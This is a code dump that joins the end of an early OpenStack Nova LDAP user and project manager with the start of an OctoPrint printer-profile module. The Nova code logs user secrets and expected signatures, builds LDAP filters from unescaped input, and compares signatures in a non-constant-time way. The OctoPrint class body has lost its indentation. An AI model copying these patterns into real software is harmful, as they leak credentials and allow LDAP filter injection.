        zippy.writestr(FLAGS.credential_rc_file, rc)
        zippy.writestr(FLAGS.credential_key_file, private_key)
        zippy.writestr(FLAGS.credential_cert_file, signed_cert)
        zippy.writestr("nebula-client.conf", config)
        zippy.writestr(FLAGS.ca_file, crypto.fetch_ca(self.id))
        zippy.close()
        with open(zf, 'rb') as f:
            buffer = f.read()  # NOTE(review): shadows the builtin 'buffer'
        shutil.rmtree(tmpdir)
        return buffer

    def generate_x509_cert(self, user):
        """Return (private_key, signed_cert) for *user* in this project."""
        return UserManager.instance().generate_x509_cert(user, self)

    def __repr__(self):
        return "Project('%s', '%s', '%s', %s)" % (self.id, self.project_manager_id, self.description, self.member_ids)
class UserManager(object):
    """Singleton facade over LDAPWrapper for users, projects, roles and
    keypairs.  All persistent state lives in the directory (or fakeldap
    when FLAGS.fake_users is set)."""

    def __init__(self):
        # guard against direct construction once the singleton exists
        if hasattr(self.__class__, '_instance'):
            raise Exception('Attempted to instantiate singleton')

    @classmethod
    def instance(cls):
        """Return the process-wide singleton, creating it on first use."""
        if not hasattr(cls, '_instance'):
            inst = UserManager()
            cls._instance = inst
            if FLAGS.fake_users:
                # seed well-known test accounts; they may already exist
                # from a previous run, which is fine (was a bare except)
                for name, admin in (('fake', False),
                                    ('user', False),
                                    ('admin', True)):
                    try:
                        inst.create_user(name, name, name, admin)
                    except exception.Duplicate:
                        pass
        return cls._instance

    def authenticate(self, access, signature, params, verb='GET',
                     server_string='127.0.0.1:8773', path='/',
                     verify_signature=True):
        """Authenticate an ec2-style signed request.

        *access* may carry a project suffix ('accesskey:project'); when
        absent the user's own project is assumed.  Returns a
        (user, project) pair or raises NotFound / NotAuthorized.
        """
        # TODO: Check for valid timestamp
        (access_key, sep, project_name) = access.partition(':')

        user = self.get_user_from_access_key(access_key)
        if user is None:  # was '== None'
            raise exception.NotFound('No user found for access key')
        if project_name == '':
            # BUG FIX: was "is ''", an identity test that only works by
            # accident of CPython string interning
            project_name = user.name

        project = self.get_project(project_name)
        if project is None:
            raise exception.NotFound('No project called %s could be found' % project_name)
        if not user.is_admin() and not project.has_member(user):
            raise exception.NotFound('User %s is not a member of project %s' % (user.id, project.id))
        if verify_signature:
            # hmac can't handle unicode, so encode ensures that secret isn't unicode
            expected_signature = signer.Signer(user.secret.encode()).generate(params, verb, server_string, path)
            logging.debug('user.secret: %s', user.secret)
            logging.debug('expected_signature: %s', expected_signature)
            logging.debug('signature: %s', signature)
            if signature != expected_signature:
                raise exception.NotAuthorized('Signature does not match')
        return (user, project)

    def has_role(self, user, role, project=None):
        """Check a role; 'projectmanager' is derived from the project
        record, and project-scoped roles additionally require the role to
        be held globally."""
        with LDAPWrapper() as conn:
            if project and role == 'projectmanager':
                return self.is_project_manager(user, project)

            global_role = conn.has_role(User.safe_id(user),
                                        role,
                                        None)
            if not global_role:
                return global_role

            if not project or role in FLAGS.global_roles:
                return global_role

            return conn.has_role(User.safe_id(user),
                                 role,
                                 Project.safe_id(project))

    def add_role(self, user, role, project=None):
        with LDAPWrapper() as conn:
            return conn.add_role(User.safe_id(user), role, Project.safe_id(project))

    def remove_role(self, user, role, project=None):
        with LDAPWrapper() as conn:
            return conn.remove_role(User.safe_id(user), role, Project.safe_id(project))

    def create_project(self, name, manager_user, description=None, member_users=None):
        if member_users:
            member_users = [User.safe_id(u) for u in member_users]
        with LDAPWrapper() as conn:
            return conn.create_project(name, User.safe_id(manager_user), description, member_users)

    def get_projects(self):
        with LDAPWrapper() as conn:
            return conn.find_projects()

    def get_project(self, project):
        with LDAPWrapper() as conn:
            return conn.find_project(Project.safe_id(project))

    def add_to_project(self, user, project):
        with LDAPWrapper() as conn:
            return conn.add_to_project(User.safe_id(user), Project.safe_id(project))

    def is_project_manager(self, user, project):
        if not isinstance(project, Project):
            project = self.get_project(project)
        return project.has_manager(user)

    def is_project_member(self, user, project):
        # avoid a directory round-trip when we already have the object
        if isinstance(project, Project):
            return project.has_member(user)
        else:
            with LDAPWrapper() as conn:
                return conn.is_in_project(User.safe_id(user), project)

    def remove_from_project(self, user, project):
        with LDAPWrapper() as conn:
            return conn.remove_from_project(User.safe_id(user), Project.safe_id(project))

    def delete_project(self, project):
        with LDAPWrapper() as conn:
            return conn.delete_project(Project.safe_id(project))

    def get_user(self, uid):
        with LDAPWrapper() as conn:
            return conn.find_user(uid)

    def get_user_from_access_key(self, access_key):
        with LDAPWrapper() as conn:
            return conn.find_user_by_access_key(access_key)

    def get_users(self):
        with LDAPWrapper() as conn:
            return conn.find_users()

    def create_user(self, user, access=None, secret=None, admin=False, create_project=True):
        """Create a user; access/secret keys default to fresh uuids, and
        a same-named project is created unless disabled."""
        if access is None:  # was '== None'
            access = str(uuid.uuid4())
        if secret is None:
            secret = str(uuid.uuid4())
        with LDAPWrapper() as conn:
            user = User.safe_id(user)
            result = conn.create_user(user, access, secret, admin)
            if create_project:
                conn.create_project(user, user, user)
            return result

    def delete_user(self, user, delete_project=True):
        """Delete a user and (by default) the same-named project, which
        may legitimately be missing already."""
        with LDAPWrapper() as conn:
            user = User.safe_id(user)
            if delete_project:
                try:
                    conn.delete_project(user)
                except exception.NotFound:
                    pass
            conn.delete_user(user)

    def generate_key_pair(self, user, key_name):
        """Generate a new keypair for *user*; returns (private_key,
        fingerprint) and stores the public half in the directory."""
        # generating key pair is slow so delay generation
        # until after check
        user = User.safe_id(user)
        with LDAPWrapper() as conn:
            if not conn.user_exists(user):
                raise exception.NotFound("User %s doesn't exist" % user)
            if conn.key_pair_exists(user, key_name):
                raise exception.Duplicate("The keypair %s already exists" % key_name)
        private_key, public_key, fingerprint = crypto.generate_key_pair()
        self.create_key_pair(user, key_name, public_key, fingerprint)
        return private_key, fingerprint

    def create_key_pair(self, user, key_name, public_key, fingerprint):
        with LDAPWrapper() as conn:
            return conn.create_key_pair(User.safe_id(user), key_name, public_key, fingerprint)

    def get_key_pair(self, user, key_name):
        with LDAPWrapper() as conn:
            return conn.find_key_pair(User.safe_id(user), key_name)

    def get_key_pairs(self, user):
        with LDAPWrapper() as conn:
            return conn.find_key_pairs(User.safe_id(user))

    def delete_key_pair(self, user, key_name):
        with LDAPWrapper() as conn:
            conn.delete_key_pair(User.safe_id(user), key_name)

    def generate_x509_cert(self, user, project):
        """Return (private_key, signed_cert) for *user* in *project*."""
        (private_key, csr) = crypto.generate_x509_cert(self.__cert_subject(User.safe_id(user)))
        # TODO - This should be async call back to the cloud controller
        signed_cert = crypto.sign_csr(csr, Project.safe_id(project))
        return (private_key, signed_cert)

    def __cert_subject(self, uid):
        # FIXME(ja) - this should be pulled from a global configuration
        return "/C=US/ST=California/L=MountainView/O=AnsoLabs/OU=NovaDev/CN=%s-%s" % (uid, str(datetime.datetime.utcnow().isoformat()))
class LDAPWrapper(object):
    """Context-managed connection to the ldap server (or fakeldap when
    FLAGS.fake_users is set) implementing the directory operations behind
    UserManager.  Use as ``with LDAPWrapper() as conn: ...``."""

    def __init__(self):
        self.user = FLAGS.user_dn
        self.passwd = FLAGS.ldap_password

    def __enter__(self):
        self.connect()
        return self

    def __exit__(self, type, value, traceback):
        #logging.info('type, value, traceback: %s, %s, %s', type, value, traceback)
        self.conn.unbind_s()
        # returning False propagates any exception raised inside the block
        return False

    def connect(self):
        """ connect to ldap as admin user """
        if FLAGS.fake_users:
            self.conn = fakeldap.initialize(FLAGS.ldap_url)
        else:
            assert(ldap.__name__ != 'fakeldap')
            self.conn = ldap.initialize(FLAGS.ldap_url)
        self.conn.simple_bind_s(self.user, self.passwd)

    def find_object(self, dn, query = None):
        """Return the first entry matching *query* under *dn*, or None."""
        objects = self.find_objects(dn, query)
        if len(objects) == 0:
            return None
        return objects[0]

    def find_objects(self, dn, query = None):
        """Return the attribute dicts of all entries matching *query*.

        NOTE(review): all search errors (including a missing subtree) are
        swallowed and reported as an empty result."""
        try:
            res = self.conn.search_s(dn, ldap.SCOPE_SUBTREE, query)
        except Exception:
            return []
        # just return the attributes
        return [x[1] for x in res]

    def find_users(self):
        """All User objects in the user subtree."""
        attrs = self.find_objects(FLAGS.user_ldap_subtree, '(objectclass=novaUser)')
        return [self.__to_user(attr) for attr in attrs]

    def find_key_pairs(self, uid):
        """All KeyPair objects stored beneath the given user."""
        attrs = self.find_objects(self.__uid_to_dn(uid), '(objectclass=novaKeyPair)')
        return [self.__to_key_pair(uid, attr) for attr in attrs]

    def find_projects(self):
        """All Project objects in the project subtree."""
        attrs = self.find_objects(FLAGS.project_ldap_subtree, '(objectclass=novaProject)')
        return [self.__to_project(attr) for attr in attrs]

    def find_roles(self, tree):
        """All role groups (groupOfNames that are not projects) in *tree*."""
        attrs = self.find_objects(tree, '(&(objectclass=groupOfNames)(!(objectclass=NovaProject)))')
        return [self.__to_group(attr) for attr in attrs]

    def find_groups_with_member(self, tree, dn):
        """All groups in *tree* that list *dn* as a member."""
        attrs = self.find_objects(tree, '(&(objectclass=groupOfNames)(member=%s))' % dn )
        return [self.__to_group(attr) for attr in attrs]

    def find_user(self, uid):
        """The User with the given uid, or None."""
        attr = self.find_object(self.__uid_to_dn(uid), '(objectclass=novaUser)')
        return self.__to_user(attr)

    def find_key_pair(self, uid, key_name):
        """The named KeyPair beneath the given user, or None."""
        dn = 'cn=%s,%s' % (key_name,
                           self.__uid_to_dn(uid))
        attr = self.find_object(dn, '(objectclass=novaKeyPair)')
        return self.__to_key_pair(uid, attr)

    def find_group(self, dn):
        """uses dn directly instead of constructing it from name"""
        attr = self.find_object(dn, '(objectclass=groupOfNames)')
        return self.__to_group(attr)

    def find_project(self, name):
        """The Project with the given cn, or None."""
        dn = 'cn=%s,%s' % (name,
                           FLAGS.project_ldap_subtree)
        attr = self.find_object(dn, '(objectclass=novaProject)')
        return self.__to_project(attr)

    # --- existence checks -------------------------------------------------
    def user_exists(self, name):
        return self.find_user(name) != None

    def key_pair_exists(self, uid, key_name):
        return self.find_key_pair(uid, key_name) != None

    def project_exists(self, name):
        return self.find_project(name) != None

    def group_exists(self, dn):
        return self.find_group(dn) != None

    def delete_key_pairs(self, uid):
        """Delete every keypair stored for the given user."""
        keys = self.find_key_pairs(uid)
        if keys != None:
            for key in keys:
                self.delete_key_pair(uid, key.name)

    def create_user(self, name, access_key, secret_key, is_admin):
        """Add a novaUser entry; raises Duplicate if the uid exists."""
        if self.user_exists(name):
            raise exception.Duplicate("LDAP user %s already exists" % name)
        attr = [
            ('objectclass', ['person',
                             'organizationalPerson',
                             'inetOrgPerson',
                             'novaUser']),
            ('ou', [FLAGS.user_unit]),
            ('uid', [name]),
            ('sn', [name]),
            ('cn', [name]),
            ('secretKey', [secret_key]),
            ('accessKey', [access_key]),
            ('isAdmin', [str(is_admin).upper()]),
        ]
        self.conn.add_s(self.__uid_to_dn(name), attr)
        return self.__to_user(dict(attr))

    def create_project(self, name, manager_uid, description=None, member_uids=None):
        """Add a novaProject entry; the manager is always made a member
        since the 'member' attribute is required by the schema."""
        if self.project_exists(name):
            raise exception.Duplicate("Project can't be created because project %s already exists" % name)
        if not self.user_exists(manager_uid):
            raise exception.NotFound("Project can't be created because manager %s doesn't exist" % manager_uid)
        manager_dn = self.__uid_to_dn(manager_uid)
        # description is a required attribute
        if description is None:
            description = name
        members = []
        if member_uids != None:
            for member_uid in member_uids:
                if not self.user_exists(member_uid):
                    raise exception.NotFound("Project can't be created because user %s doesn't exist" % member_uid)
                members.append(self.__uid_to_dn(member_uid))
        # always add the manager as a member because members is required
        if not manager_dn in members:
            members.append(manager_dn)
        attr = [
            ('objectclass', ['novaProject']),
            ('cn', [name]),
            ('description', [description]),
            ('projectManager', [manager_dn]),
            ('member', members)
        ]
        self.conn.add_s('cn=%s,%s' % (name, FLAGS.project_ldap_subtree), attr)
        return self.__to_project(dict(attr))

    # --- project membership (delegates to the generic group helpers) -----
    def add_to_project(self, uid, project_id):
        dn = 'cn=%s,%s' % (project_id, FLAGS.project_ldap_subtree)
        return self.add_to_group(uid, dn)

    def remove_from_project(self, uid, project_id):
        dn = 'cn=%s,%s' % (project_id, FLAGS.project_ldap_subtree)
        return self.remove_from_group(uid, dn)

    def is_in_project(self, uid, project_id):
        dn = 'cn=%s,%s' % (project_id, FLAGS.project_ldap_subtree)
        return self.is_in_group(uid, dn)

    def __role_to_dn(self, role, project_id=None):
        """Global roles map to the ldap_<role> flag; project roles live
        beneath the project entry."""
        if project_id == None:
            return FLAGS.__getitem__("ldap_%s" % role).value
        else:
            return 'cn=%s,cn=%s,%s' % (role, project_id, FLAGS.project_ldap_subtree)

    def __create_group(self, group_dn, name, uid, description, member_uids = None):
        """Add a groupOfNames entry; *uid* is always included since the
        'member' attribute is required."""
        if self.group_exists(name):
            raise exception.Duplicate("Group can't be created because group %s already exists" % name)
        members = []
        if member_uids != None:
            for member_uid in member_uids:
                if not self.user_exists(member_uid):
                    raise exception.NotFound("Group can't be created because user %s doesn't exist" % member_uid)
                members.append(self.__uid_to_dn(member_uid))
        dn = self.__uid_to_dn(uid)
        if not dn in members:
            members.append(dn)
        attr = [
            ('objectclass', ['groupOfNames']),
            ('cn', [name]),
            ('description', [description]),
            ('member', members)
        ]
        self.conn.add_s(group_dn, attr)
        return self.__to_group(dict(attr))

    def has_role(self, uid, role, project_id=None):
        role_dn = self.__role_to_dn(role, project_id)
        return self.is_in_group(uid, role_dn)

    def add_role(self, uid, role, project_id=None):
        """Grant a role, creating the role group on first use.

        NOTE(review): the creation branch does not return the new group,
        so the return value differs between first and later grants."""
        role_dn = self.__role_to_dn(role, project_id)
        if not self.group_exists(role_dn):
            # create the role if it doesn't exist
            description = '%s role for %s' % (role, project_id)
            self.__create_group(role_dn, role, uid, description)
        else:
            return self.add_to_group(uid, role_dn)

    def remove_role(self, uid, role, project_id=None):
        role_dn = self.__role_to_dn(role, project_id)
        try:
            return self.remove_from_group(uid, role_dn)
        except Exception, ex:
            # NOTE(review): failures are printed and swallowed
            print type(ex), ex

    def is_in_group(self, uid, group_dn):
        """True if the user's dn is a member of the group; a missing
        group simply means False."""
        if not self.user_exists(uid):
            raise exception.NotFound("User %s can't be searched in group becuase the user doesn't exist" % (uid,))
        if not self.group_exists(group_dn):
            return False
        res = self.find_object(group_dn,
                               '(member=%s)' % self.__uid_to_dn(uid))
        return res != None

    def add_to_group(self, uid, group_dn):
        """Add the user's dn to an existing group."""
        if not self.user_exists(uid):
            raise exception.NotFound("User %s can't be added to the group becuase the user doesn't exist" % (uid,))
        if not self.group_exists(group_dn):
            raise exception.NotFound("The group at dn %s doesn't exist" % (group_dn,))
        if self.is_in_group(uid, group_dn):
            raise exception.Duplicate("User %s is already a member of the group %s" % (uid, group_dn))
        attr = [
            (ldap.MOD_ADD, 'member', self.__uid_to_dn(uid))
        ]
        self.conn.modify_s(group_dn, attr)

    def remove_from_group(self, uid, group_dn):
        """Remove the user's dn from a group; the last member cannot be
        removed (schema requires one), so the group is deleted instead."""
        if not self.group_exists(group_dn):
            raise exception.NotFound("The group at dn %s doesn't exist" % (group_dn,))
        if not self.user_exists(uid):
            raise exception.NotFound("User %s can't be removed from the group because the user doesn't exist" % (uid,))
        if not self.is_in_group(uid, group_dn):
            raise exception.NotFound("User %s is not a member of the group" % (uid,))
        attr = [
            (ldap.MOD_DELETE, 'member', self.__uid_to_dn(uid))
        ]
        try:
            self.conn.modify_s(group_dn, attr)
        except ldap.OBJECT_CLASS_VIOLATION:
            logging.debug("Attempted to remove the last member of a group. Deleting the group instead.")
            self.delete_group(group_dn)

    def remove_from_all(self, uid):
        """Remove the user's dn from every role and project group."""
        # FIXME(vish): what if deleted user is a project manager?
        if not self.user_exists(uid):
            raise exception.NotFound("User %s can't be removed from all because the user doesn't exist" % (uid,))
        dn = self.__uid_to_dn(uid)
        attr = [
            (ldap.MOD_DELETE, 'member', dn)
        ]
        roles = self.find_groups_with_member(FLAGS.role_ldap_subtree, dn)
        for role in roles:
            self.conn.modify_s('cn=%s,%s' % (role.id, FLAGS.role_ldap_subtree), attr)
        projects = self.find_groups_with_member(FLAGS.project_ldap_subtree, dn)
        for project in projects:
            self.conn.modify_s('cn=%s,%s' % (project.id, FLAGS.project_ldap_subtree), attr)

    def create_key_pair(self, uid, key_name, public_key, fingerprint):
        """create's a public key in the directory underneath the user"""
        # TODO(vish): possibly refactor this to store keys in their own ou
        #   and put dn reference in the user object
        attr = [
            ('objectclass', ['novaKeyPair']),
            ('cn', [key_name]),
            ('sshPublicKey', [public_key]),
            ('keyFingerprint', [fingerprint]),
        ]
        self.conn.add_s('cn=%s,%s' % (key_name,
                                      self.__uid_to_dn(uid)),
                        attr)
        return self.__to_key_pair(uid, dict(attr))

    def find_user_by_access_key(self, access):
        """The User whose accessKey matches, or None."""
        query = '(accessKey=%s)' % access
        dn = FLAGS.user_ldap_subtree
        return self.__to_user(self.find_object(dn, query))

    def delete_user(self, uid):
        """Delete a user together with its keypairs and group memberships."""
        if not self.user_exists(uid):
            raise exception.NotFound("User %s doesn't exist" % uid)
        self.delete_key_pairs(uid)
        self.remove_from_all(uid)
        self.conn.delete_s('uid=%s,%s' % (uid,
                                          FLAGS.user_ldap_subtree))

    def delete_key_pair(self, uid, key_name):
        if not self.key_pair_exists(uid, key_name):
            raise exception.NotFound("Key Pair %s doesn't exist for user %s" %
                                     (key_name, uid))
        self.conn.delete_s('cn=%s,uid=%s,%s' % (key_name, uid,
                                                FLAGS.user_ldap_subtree))

    def delete_group(self, group_dn):
        if not self.group_exists(group_dn):
            raise exception.NotFound("Group at dn %s doesn't exist" % group_dn)
        self.conn.delete_s(group_dn)

    def delete_roles(self, project_dn):
        """Delete every role group nested beneath a project entry."""
        roles = self.find_roles(project_dn)
        if roles != None:
            for role in roles:
                self.delete_group('cn=%s,%s' % (role.id, project_dn))

    def delete_project(self, name):
        """Delete a project entry and its nested role groups."""
        project_dn = 'cn=%s,%s' % (name, FLAGS.project_ldap_subtree)
        self.delete_roles(project_dn)
        self.delete_group(project_dn)

    # --- converters from ldap attribute dicts to model objects ------------
    def __to_user(self, attr):
        if attr == None:
            return None
        return User(
            id = attr['uid'][0],
            name = attr['cn'][0],
            access = attr['accessKey'][0],
            secret = attr['secretKey'][0],
            admin = (attr['isAdmin'][0] == 'TRUE')
        )

    def __to_key_pair(self, owner, attr):
        if attr == None:
            return None
        return KeyPair(
            id = attr['cn'][0],
            owner_id = owner,
            public_key = attr['sshPublicKey'][0],
            fingerprint = attr['keyFingerprint'][0],
        )

    def __to_group(self, attr):
        if attr == None:
            return None
        member_dns = attr.get('member', [])
        return Group(
            id = attr['cn'][0],
            description = attr.get('description', [None])[0],
            member_ids = [self.__dn_to_uid(x) for x in member_dns]
        )

    def __to_project(self, attr):
        if attr == None:
            return None
        member_dns = attr.get('member', [])
        return Project(
            id = attr['cn'][0],
            project_manager_id = self.__dn_to_uid(attr['projectManager'][0]),
            description = attr.get('description', [None])[0],
            member_ids = [self.__dn_to_uid(x) for x in member_dns]
        )

    def __dn_to_uid(self, dn):
        """Extract the value of the first RDN, e.g. uid=foo,... -> foo."""
        return dn.split(',')[0].split('=')[1]

    def __uid_to_dn(self, dn):
        # NOTE(review): the parameter is a uid despite its name
        return 'uid=%s,%s' % (dn, FLAGS.user_ldap_subtree)
| sorenh/cc | nova/auth/users.py | Python | apache-2.0 | 32,614 |
# coding=utf-8
from __future__ import absolute_import
__author__ = "Gina Häußge <osd@foosel.net>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
import os
import copy
import re
from octoprint.settings import settings
from octoprint.util import dict_merge, dict_clean
#lkj
from octoprint.comm.protocol.reprap.util import GcodeCommand
class SaveError(Exception):
    """Raised when saving a printer profile fails."""
    pass
class MachineType(object):
    """Symbolic names for the supported printer kinematics types."""
    XYZ = "XYZ"
    Delta = "Delta"
    CoreXY = "CoreXY"
class BedTypes(object):
    """Form factors a print bed can have."""
    RECTANGULAR = "rectangular"
    CIRCULAR = "circular"
class PrinterProfileManager(object):
#lkj
COMMAND_Finish_sending_M910 = GcodeCommand("M910")
COMMAND_Has_bed_M908 = staticmethod(lambda s: GcodeCommand("M908", s=s))
COMMAND_Steps_per_unit_M92 = staticmethod(lambda x, y, z, e: GcodeCommand("M92", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Maximum_area_unit_M520 = staticmethod(lambda x, y, z: GcodeCommand("M520", x=x if x else None, y=y if y else None, z=z if z else None))
COMMAND_Homing_direction_M525 = staticmethod(lambda x, y, z: GcodeCommand("M525", x=x, y=y, z=z))
COMMAND_Home_offset_M206_T0 = staticmethod(lambda s, t, x, y, z: GcodeCommand("M206", s=s, t=t, x=x, y=y, z=z))
#COMMAND_Home_offset_M206_T1 = staticmethod(lambda x, y, z: GcodeCommand("M206", x=x if x else None, y=y if y else None, z=z if z else None))
COMMAND_Axis_invert_M510 = staticmethod(lambda x, y, z, e: GcodeCommand("M510", x=x, y=y, z=z, e=e))
COMMAND_Stepper_current_M906 = staticmethod(lambda x, y, z, e, b: GcodeCommand("M906", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None, b=b if b else None))
COMMAND_Stepper_mircostep_M909 = staticmethod(lambda x, y, z, e, b: GcodeCommand("M909", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None, b=b if b else None))
COMMAND_Endstop_invert_M526 = staticmethod(lambda x, y, z: GcodeCommand("M526", x=x, y=y, z=z))
COMMAND_Minimum_endstop_input_M523 = staticmethod(lambda x, y, z: GcodeCommand("M523", x=x , y=y , z=z))
COMMAND_Maximum_endstop_input_M524 = staticmethod(lambda x, y, z: GcodeCommand("M524", x=x, y=y, z=z))
COMMAND_Use_software_endstop_M522 = staticmethod(lambda i, a: GcodeCommand("M522", i=i, a=a))
COMMAND_Retract_length_M207 = staticmethod(lambda s, f, z: GcodeCommand("M207", s=s if s else None, f=f if f else None, z=z if z else None))
COMMAND_Retract_recover_length_M208 = staticmethod(lambda s, f: GcodeCommand("M208", s=s if s else None, f=f if f else None))
COMMAND_Maximum_feedrates_M203 = staticmethod(lambda x, y, z, e: GcodeCommand("M203", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Homing_feedrate_M210 = staticmethod(lambda x, y, z, e: GcodeCommand("M210", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Maximum_acceleration_M201 = staticmethod(lambda x, y, z, e: GcodeCommand("M201", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Acceleration_M204 = staticmethod(lambda s, t: GcodeCommand("M204", s=s if s else None, t=t if t else None))
COMMAND_Advanced_variables_M205 = staticmethod(lambda s, t, x, z, e: GcodeCommand("M205", s=s if s else None, t=t if t else None, x=x if x else None, z=z if z else None, e=e if e else None))
COMMAND_TEMPETURE_PID_M301 = staticmethod(lambda t, p, i, d, s, b, w: GcodeCommand("M301", t=t, p=p, i=i, d=d, s=s, b=b, w=w))
COMMAND_DELTA_ARGS_M665 = staticmethod(lambda l, r, s, z: GcodeCommand("M665", l=l, r=r, s=s, z=z))
COMMAND_MACHINE_TYPE_M913 = staticmethod(lambda s: GcodeCommand("M913", s=s))
COMMAND_DYNAMIC_CURRENT_M911 = staticmethod(lambda s: GcodeCommand("M911", s=s))
COMMAND_BBP1_EXTENT_INTERFACE_M916 = staticmethod(lambda s,t: GcodeCommand("M916", s=s, t=t))
default = dict(
id = "_default",
name = "Default",
model = "Generic RepRap Printer",
color = "default",
volume=dict(
width = 200,
depth = 200,
height = 200,
formFactor = BedTypes.RECTANGULAR,
),
heatedBed = True,
dynamicCurrent = False,
machineType = MachineType.XYZ,
pids = dict(
t0 = dict(p=10.0, i=0.5, d=0.0, limit=10.0, factor=0.033, offset=40.0),
t1 = dict(p=10.0, i=0.5, d=0.0, limit=10.0, factor=0.033, offset=40.0),
bed = dict(p=10.0, i=0.5, d=0.0, limit=10.0, factor=0.033, offset=40.0),
),
delta_args = dict(
diagonal_rod = 250.0,
print_radius = 175.0,
z_home_pos = 33.0,
segments_per_second = 18.0,
),
extendInterface = 1,
thermocouple = 3,
extruder=dict(
count = 1,
offsets = [
dict(x=0.0, y=0.0,z=0.0)
#(0, 0, 0)
],
nozzleDiameter = 0.4
),
axes=dict(
x = dict(speed=500, inverted=True),
y = dict(speed=500, inverted=False),
z = dict(speed=5, inverted=True),
e = dict(speed=25, inverted=False)
),
#lkj
cmdPrintStart=[
dict(cmd="M80"),
dict(cmd="G28 X0 Y0"),
dict(cmd="G28 Z0"),
dict(cmd="G1 Z15.0 F6000"),
dict(cmd="M140 S60.0"),
dict(cmd="M104 T0 S200.0"),
dict(cmd="M109 T0 S200.0"),
dict(cmd="M190 S60.0")
# dict(cmd="G92 E0"),
# dict(cmd="G1 F600 E64"),
# dict(cmd="G92 E0")
],
cmdPrintStop=[
#dict(cmd="G28 X0 Y0"),
dict(cmd="M84 S1")
],
stepsPerUnit = dict(
x = 157.4804,
y = 157.4804,
z = 2133.33,
e = 304
),
homingDirection=dict(
x = False,
y = False,
z = False,
),
stepperCurrent = dict(
x = 800,
y = 800,
z = 450,
t0 = 450,
t1 = 450,
),
stepperMircostep = dict(
x = 32,
y = 32,
z = 32,
t0 = 32,
t1 = 32,
),
endstopInvert = dict(
x = False,
y = False,
z = False
),
endstopMinimumInput = dict(
x = True,
y = True,
z = True,
),
endstopMaxmumInput = dict(
x = True,
y = True,
z = True,
),
endstopUseSoftware = dict(
minVal = False,
maxVal = True,
),
retractLength = dict(
length = 3,
feedrate = 25,
zlift = 0,
),
retractRecoverLength = dict(
length = 2,
feedrate = 20,
),
homingFeedrates = dict(
x = 3000,
y = 3000,
z = 120,
e = 0,
),
accelerationMaximum = dict(
x = 9000,
y = 9000,
z = 100,
e = 10000,
),
accelerationMoveRetract = dict(
move = 4000,
retract= 3000,
),
advancedVariables = dict(
minimumfeedrate = 0,
mintravelfeedrate = 0,
maxXYJerk = 100,
maxZJerk = 0.4,
maxEJerk = 5.0,
)
)
	def __init__(self):
		# currently selected profile dict; None when nothing is selected
		self._current = None
		# base folder where the <identifier>.profile YAML files are stored
		self._folder = settings().getBaseFolder("printerProfiles")
def select(self, identifier):
#lkj
ret_select=False
if identifier is None or not self.exists(identifier):
self._current = self.get_default()
#return False
ret_select = False
else:
self._current = self.get(identifier)
#return True
ret_select = True
print("lkj, select a profile !!!!")
self.sendPreferenctParameter(self._current)
self.getBeforeAndAfterPrintParameter(self._current)
return ret_select
	def deselect(self):
		"""Clear the current profile selection."""
		self._current = None
	def get_all(self):
		"""Return all stored profiles as a dict keyed by identifier."""
		return self._load_all()
def get(self, identifier):
if identifier == "_default":
return self._load_default()
elif self.exists(identifier):
return self._load_from_path(self._get_profile_path(identifier))
else:
return None
def remove(self, identifier):
if identifier == "_default":
return False
if self._current is not None and self._current["id"] == identifier:
return False
return self._remove_from_path(self._get_profile_path(identifier))
	def __send_all_update_epprom(self, profile):
		"""Translate a profile dict into the list of G-code commands that
		push every machine setting to the firmware, terminated by M910.

		Only keys present in profile are translated. Sections wrapped in
		triple-quoted strings are intentionally disabled settings kept
		for reference.
		"""
		#print("__send_all_update_epprom, profile=%s" % repr(profile))
		cmds = []
		# heated bed presence -> M908
		if "heatedBed" in profile:
			hasBed = 1
			hasBed = profile["heatedBed"]
			cmds.append(self.__class__.COMMAND_Has_bed_M908(hasBed))
		# steps per unit -> M92
		if "stepsPerUnit" in profile:
			x = profile["stepsPerUnit"]["x"]
			y = profile["stepsPerUnit"]["y"]
			z = profile["stepsPerUnit"]["z"]
			e = profile["stepsPerUnit"]["e"]
			cmds.append(self.__class__.COMMAND_Steps_per_unit_M92(x,y,z,e))
		# build volume -> M520
		if "volume" in profile:
			x = profile["volume"]["width"]
			y = profile["volume"]["depth"]
			z = profile["volume"]["height"]
			cmds.append(self.__class__.COMMAND_Maximum_area_unit_M520(x,y,z))
		'''
		if "homingDirection" in profile:
			x = profile["homingDirection"]["x"]
			y = profile["homingDirection"]["y"]
			z = profile["homingDirection"]["z"]
			cmds.append(self.__class__.COMMAND_Homing_direction_M525(x,y,z))
		'''
		# per-extruder home offsets -> one M206 per extruder index
		if "extruder" in profile:
			offsets = profile["extruder"]["offsets"]
			#print("lkj offsets:%s" %(str(offsets)))
			s = profile["extruder"]["count"]
			t = 0
			#x,y,z = 0.0,0.0,0.0
			for index in range(s):
				x = offsets[index]["x"]
				y = offsets[index]["y"]
				z = offsets[index]["z"]
				#print("lkj x:%s, y:%s, z:%s" %(str(x),str(y),str(z)))
				cmds.append(self.__class__.COMMAND_Home_offset_M206_T0(s,t,x,y,z))
				t += 1
			'''
			for offset in offsets:
				if "x" in offset and offset["x"] is not None:
					x = offset["x"]
					y = offset["y"]
					z = offset["z"]
					#print("lkj x:%s, y:%s, z:%s" %(str(x),str(y),str(z)))
					cmds.append(self.__class__.COMMAND_Home_offset_M206_T0(s,t,x,y,z))
					t += 1
			'''
		# axis inversion -> M510, maximum feedrates -> M203
		if "axes" in profile:
			x = profile["axes"]["x"]["inverted"]
			y = profile["axes"]["y"]["inverted"]
			z = profile["axes"]["z"]["inverted"]
			e = profile["axes"]["e"]["inverted"]
			cmds.append(self.__class__.COMMAND_Axis_invert_M510(x,y,z,e))
			speed_x = profile["axes"]["x"]["speed"]
			speed_y = profile["axes"]["y"]["speed"]
			speed_z = profile["axes"]["z"]["speed"]
			speed_e = profile["axes"]["e"]["speed"]
			cmds.append(self.__class__.COMMAND_Maximum_feedrates_M203(speed_x,speed_y,speed_z,speed_e))
		# stepper driver currents -> M906
		if "stepperCurrent" in profile:
			x = profile["stepperCurrent"]["x"]
			y = profile["stepperCurrent"]["y"]
			z = profile["stepperCurrent"]["z"]
			t0 = profile["stepperCurrent"]["t0"]
